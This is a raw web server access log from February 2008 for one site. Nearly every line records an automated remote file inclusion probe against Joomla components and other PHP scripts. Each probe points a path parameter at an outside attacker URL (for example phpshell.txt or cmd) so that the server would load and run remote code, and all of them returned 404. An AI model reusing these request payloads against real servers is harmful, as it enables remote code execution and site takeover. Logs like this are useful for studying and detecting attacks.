67.15.204.31 - - [14/Feb/2008:10:35:34 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:36 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:36 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:36 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:36 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:36 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:35:36 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.34.16.201 - - [14/Feb/2008:10:36:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:36:58 -0800] "GET /logs/access_071220.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:36:58 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:36:59 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:14 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:14 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:15 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:16 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:17 -0800] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:17 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:31 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:31 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:31 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:37 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:37 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:37 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.135.210.75 - - [14/Feb/2008:10:37:38 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://brasirc.t35.com/phpshell.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:43 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:44 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:44 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:45 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:37:52 -0800] "GET /logs/access_071230.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:37:56 -0800] "GET /logs/access_080131.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [14/Feb/2008:10:37:59 -0800] "GET //skin/zero_vote/login.php?dir=http://www.vuls2008.kit.net/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
84.19.178.201 - - [14/Feb/2008:10:37:59 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.vuls2008.kit.net/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:38:30 -0800] "GET /logs/access_080201.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:38:31 -0800] "GET //components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:38:31 -0800] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:38:43 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:38:56 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:14 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:14 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:16 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:16 -0800] "GET /logs/access.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:16 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:17 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.206.47.131 - - [14/Feb/2008:10:39:32 -0800] "PROPFIND /instmsg/aliases/davep HTTP/1.1" 404 275 "-" "-" "dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:39:33 -0800] "GET /logs/access_080103.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.205.44 - - [14/Feb/2008:10:39:42 -0800] "GET /logs/access_080117.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.205.44 - - [14/Feb/2008:10:39:42 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.205.44 - - [14/Feb/2008:10:39:42 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.send2thailand.com/image/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:58 -0800] "GET /logs/access_071225.log//modules/class/Table.php?sys_conf[path][real]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:58 -0800] "GET //modules/class/Table.php?sys_conf[path][real]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:39:59 -0800] "GET /logs//modules/class/Table.php?sys_conf[path][real]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:40:33 -0800] "GET /logs/access_080130.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:40:43 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:40:44 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:40:44 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.68.175.66 - - [14/Feb/2008:10:40:48 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:40:54 -0800] "GET /logs/access.log//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:40:54 -0800] "GET //install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:40:55 -0800] "GET /logs//install.joomla_flash_uploader.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:40:58 -0800] "GET /logs/access_080117.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:10:40:59 -0800] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:10:40:59 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:10:41:00 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [14/Feb/2008:10:41:11 -0800] "GET /logs/access_080123.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hackergroup.altervista.org/cmd??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.135.235 - - [14/Feb/2008:10:41:46 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.135.235 - - [14/Feb/2008:10:41:55 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://phpbx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:04 -0800] "GET /logs/access_071220.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:04 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:04 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:42:06 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:42:06 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:42:06 -0800] "GET /logs/access_080106.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:06 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:42:06 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:07 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:42:07 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:07 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:07 -0800] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:42:07 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:26 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:26 -0800] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [14/Feb/2008:10:42:27 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:43:03 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:43:04 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:43:04 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:43:10 -0800] "GET /logs/access.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:43:11 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [14/Feb/2008:10:43:11 -0800] "GET //includes/orderSuccess.inc.php?include($glob['rootDir']=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:10:43:11 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:10:43:24 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:39 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:39 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:39 -0800] "GET //administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:39 -0800] "GET //administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:39 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:39 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:44 -0800] "GET /logs/access_080201.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [14/Feb/2008:10:43:44 -0800] "GET /logs/access_080201.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.68.175.66 - - [14/Feb/2008:10:43:45 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.68.175.66 - - [14/Feb/2008:10:43:45 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
